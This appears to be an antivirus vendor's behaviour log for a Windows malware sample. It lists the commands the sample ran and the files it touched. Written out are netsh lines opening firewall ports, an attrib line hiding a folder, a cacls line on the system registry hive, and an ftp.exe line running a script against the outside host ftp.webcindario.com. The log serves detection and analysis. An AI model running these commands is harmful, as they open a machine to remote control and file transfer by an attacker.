Техническая информация
- '<SYSTEM32>\netsh.exe' firewall add portopening tcp 65000 txb
- '<SYSTEM32>\netsh.exe' firewall add portopening tcp 6667 tvo
- '<SYSTEM32>\netsh.exe' firewall add portopening tcp 45008 tnt
- '<SYSTEM32>\netsh.exe' firewall add portopening tcp 59302 tvt
- '<SYSTEM32>\ping.exe' -n 5 0.0.0.0
- '<SYSTEM32>\ping.exe' -n 60 0.0.0.0
- '<SYSTEM32>\attrib.exe' +h %APPDATA%\elf
- '<SYSTEM32>\ftp.exe' -s:%WINDIR%\dat.txt ftp.webcindario.com
- '<SYSTEM32>\netsh.exe' firewall add portopening tcp 20 tdt
- '<SYSTEM32>\netsh.exe' firewall add portopening tcp 21 tst
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\adb2.bat" "
- '<SYSTEM32>\cacls.exe' "<SYSTEM32>\config\system"
- '<SYSTEM32>\netsh.exe' firewall add portopening tcp 18318 tcn
- '<SYSTEM32>\netsh.exe' firewall add portopening tcp 29003 tct
- '<SYSTEM32>\netsh.exe' firewall add portopening tcp 80 tqt
- '<SYSTEM32>\netsh.exe' firewall add portopening tcp 35001 tcy
- <SYSTEM32>\wmpnetwk.exe
- <SYSTEM32>\lsm.exe
- <SYSTEM32>\SearchIndexer.exe
- %WINDIR%\dat.txt
- <SYSTEM32>\WmiPrvSE.exe
- <SYSTEM32>\taskhost.exe
- %TEMP%\1.tmp\adb2.bat
- <SYSTEM32>\hkcmd.exe
- <SYSTEM32>\wininit.exe
- <SYSTEM32>\dwm.exe
- %WINDIR%\dat.txt
- <SYSTEM32>\Restore\rstrui.exe
- <SYSTEM32>\dllcache\rstrui.exe
- 'localhost':1050
- 'localhost':1048
- 'ft#.##bcindario.com':21
- DNS ASK ft#.##bcindario.com